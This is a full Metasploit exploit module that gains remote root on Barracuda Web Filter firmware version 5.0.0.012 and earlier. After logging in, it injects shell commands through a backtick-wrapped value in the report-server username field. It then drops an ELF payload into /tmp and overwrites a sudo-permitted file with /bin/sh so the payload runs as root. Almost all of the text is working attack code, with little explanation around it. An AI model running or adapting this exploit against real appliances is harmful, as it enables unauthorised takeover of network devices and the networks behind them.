# Exploit Title: Barracuda Firmware <= 5.0.0.012 Post Auth Remote Root exploit
# Exploit Author: xort
# Vendor Homepage: https://www.barracuda.com/
# Software Link: https://www.barracuda.com/products/webfilter
# Version: Firmware <= 5.0.0.012
# Tested on: Vx and Hardware platforms
#
# Postauth remote root in Barracuda Firmware <= 5.0.0.012 for any under priviledged user with report generating
# capablities. This exploit leverages a command injection bug along with poor sudo permissions to obtain
# root. xort@blacksecurity.org
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Barracuda Firmware <= 5.0.0.012 reporting Post Auth Remote Root',
'Description' => %q{
This module exploits a remote command execution vulnerability in
the Barracuda Firmware Version <= 5.0.0.012 by exploiting a
vulnerability in the web administration interface.
By sending a specially crafted request it's possible to inject system
commands while escalating to root do to relaxed sudo configuration on the local
machine.
},
'Author' =>
[
'xort', # metasploit module
],
'Version' => '$Revision: 12345 $',
'References' =>
[
[ 'none', 'none'],
],
'Platform' => [ 'linux'],
'Privileged' => true,
'Arch' => [ ARCH_X86 ],
'SessionTypes' => [ 'shell' ],
'Privileged' => false,
'Payload' =>
{ # note: meterpreter can't run on host do to kernel 2.4 incompatabilities + this is stable
'Compat' =>
{
'ConnectionType' => 'find',
}
},
'Targets' =>
[
['Linux Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 0))
register_options(
[
OptString.new('PASSWORD', [ false, 'Device password', "" ]),
OptString.new('ET', [ false, 'Device password', "" ]),
OptString.new('USERNAME', [ true, 'Device password', "admin" ]),
OptString.new('CMD', [ false, 'Command to execute', "" ]),
Opt::RPORT(8000),
], self.class)
end
def do_login(username, password, et)
vprint_status( "Logging into machine with credentials...\n" )
# timeout
timeout = 1550;
# params
password_clear = "admin"
real_user = "";
login_state = "out"
enc_key = Rex::Text.rand_text_hex(32)
et = "1358817515"
locale = "en_US"
user = username
password = Digest::MD5.hexdigest(username+enc_key)
enctype = "MD5"
password_entry = ""
vprint_status( "Starting first routine...\n" )
data = "real_user=#{real_user}&login_state=#{login_state}&enc_key=#{enc_key}&et=#{et}&locale=#{locale}&user=#{user}&password=#{password}&enctype=#{enctype}&password_entry=#{password_entry}&password_clear=#{password_clear}&Submit=Login"
vprint_status( "#{data}\n" )
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'cookie' => "",
'data' => data
}, timeout)
vprint_status( "login got code: #{res.code} ... continuing to second request..." )
File.open("/tmp/output2", 'w+') {|f| f.write(res.body) }
# get rid of first yank
password = res.body.split('\n').grep(/(.*)id=\"password\" value=\"(.*)\"/){$2}[0] #change to match below for more exact result
et = res.body.split('\n').grep(/(.*)id=\"et\" value=\"([^\"]+)\"/){$2}[0]
vprint_status( "password got back = #{password} - et got back = #{et}\n" )
return password, et
end
def run_command(username, password, et, cmd)
vprint_status( "Running Command...\n" )
exploitreq = [
[ "primary_tab", "BASIC" ],
[ "secondary_tab","reports" ],
[ "realm","" ],
[ "auth_type","Local" ],
[ "user", username ],
[ "password", password ],
[ "et",et ],
[ "role","" ],
[ "locale","en_US" ],
[ "q","" ],
[ "UPDATE_new_report_time_frame","custom" ],
[ "report_start","2013-01-25 01:14" ],
[ "report_end","2013-01-25 02:14" ],
[ "type","" ],
[ "ntlm_server","" ],
[ "kerb_server","" ],
[ "local_group","changeme" ],
[ "ip_group","20.20.108.0/0.0.0.0" ],
[ "ip_address__0","" ],
[ "ip_address__1","" ],
[ "ip_address__2","" ],
[ "ip_address__3","" ],
[ "netmask__0","" ],
[ "netmask__1","" ],
[ "netmask__2","" ],
[ "netmask__3","" ],
[ "UPDATE_new_report_pattern_values","" ],
[ "UPDATE_new_report_pattern_text","" ],
[ "UPDATE_new_report_filter_destination","domain" ],
[ "filter_domain","" ],
[ "UPDATE_new_report_filter_domain","" ],
[ "UPDATE_new_report_filter_category","" ],
[ "UPDATE_new_report_exclude_from","" ],
[ "UPDATE_new_report_exclude_to","" ],
[ "UPDATE_new_report_exclude_days","" ],
[ "allow","allow" ],
[ "block","block" ],
[ "warn","warn" ],
[ "monitor","monitor" ],
[ "UPDATE_new_report_filter_actions","allow,block,warn,monitor" ],
[ "UPDATE_new_report_filter_count","10" ],
[ "UPDATE_new_report_chart_type","vbar" ],
[ "UPDATE_new_report_format","html" ],
[ "DEFAULT_new_report_group_expand","No" ],
[ "UPDATE_new_report_expand_user_count","5" ],
[ "UPDATE_new_report_expand_domain_count","5" ],
[ "UPDATE_new_report_expand_cat_count","5" ],
[ "UPDATE_new_report_expand_url_count","5" ],
[ "UPDATE_new_report_expand_threat_count","5" ],
[ "report","on" ],
[ "UPDATE_new_report_name", Rex::Text.rand_text_alphanumeric(10) ],
[ "UPDATE_new_report_id","" ],
[ "UPDATE_new_report_enabled","Yes" ],
[ "secondary_scope","report" ],
[ "secondary_scope_data","" ],
[ "UPDATE_new_report_reports","sessions_by_user,infection_activity" ],
[ "UPDATE_new_report_delivery","external" ],
[ "UPDATE_new_report_delivery_dest_email","" ],
[ "UPDATE_new_report_server","new" ],
[ "UPDATE_new_external_server_type","smb" ],
[ "UPDATE_new_external_server_alias", Rex::Text.rand_text_alphanumeric(10) ],
[ "UPDATE_new_external_server","4.4.4.4" ],
[ "UPDATE_new_external_server_port","445" ],
[ "UPDATE_new_external_server_username","\"` #{cmd} `\"" ],
[ "UPDATE_new_external_server_password","asdf" ],
[ "UPDATE_new_external_server_path","/"+ Rex::Text.rand_text_alphanumeric(15) ],
[ "UPDATE_new_report_frequency", "once" ],
[ "UPDATE_new_report_split", "no" ],
[ "add_report_id","Apply" ],
[ "remover","" ]
]
data = Rex::MIME::Message.new
data.bound = "---------------------------" + Rex::Text.rand_text_numeric(30)
exploitreq.each do |xreq|
data.add_part(xreq[1], nil, nil, "form-data; name=\"" + xreq[0] + "\"")
end
post_data = data.to_s
post_data = post_data.gsub(/\r\n---------------------------/, "---------------------------")
datastore['UserAgent'] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0"
vprint_status( "sending..." )
res = send_request_cgi({
'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data,
'headers' =>
{
'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'Accept-Language' => "en-US,en;q=0.5"
}
})
if res.code == 200
vprint_status( "You can now reuse the login params you were supplied to avoid the lengthy wait at the exploits initial launch.... \n" )
vprint_status( "password: #{password} et: #{et}\n" )
end
vprint_status( "login got code: #{res.code} from report_results.cgi\n" )
File.open("/tmp/output4", 'w+') {|f| f.write(res.body) }
end
def run_script(username, password, et, cmds)
vprint_status( "running script...\n")
end
def exploit
# timeout
timeout = 1550;
user = "admin"
# params
real_user = "";
login_state = "out"
et = "1358817515" #epoch time
locale = "en_US"
user = "admin"
password = ""
enctype = "MD5"
password_entry = ""
password_clear = "admin"
vprint_status("<- Encoding payload to elf string...")
elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\x\1\2') # extra escaping to get passed down correctly
if not datastore['PASSWORD'].nil? and not datastore['PASSWORD'].empty?
password_clear = "admin"
password = datastore['PASSWORD']
et = datastore['ET']
# else - if no 'CMD' string - add code for root shell
else
password, et = do_login(user, password, et)
vprint_status("new password: #{password}\n")
end
sleep(5)
if not datastore['CMD'].nil? and not datastore['CMD'].empty?
cmd = datastore['CMD']
end
run_command(user, password, et, cmd)
# create elf in /tmp, abuse sudo to overwrite another command we have sudo access to (tar), then execute with sudo perm
cmd = "echo -ne #{encoded_elf} > /tmp/x ;"
cmd += "chmod +x /tmp/x ;"
# backup static_routes file
cmd += "cp -f /home/product/code/config/static_routes /tmp/zzz"
cmd += "sudo cp -f /bin/sh /home/product/code/config/static_routes"
# execute elf as root
cmd += "sudo /home/product/code/config/static_routes -c /tmp/x ;"
# restore static_routes file
cmd += "cp -f /tmp/zzz /home/product/code/config/static_routes"
run_command(user, password, et, cmd)
sleep(2)
handler
sleep(5)
end
end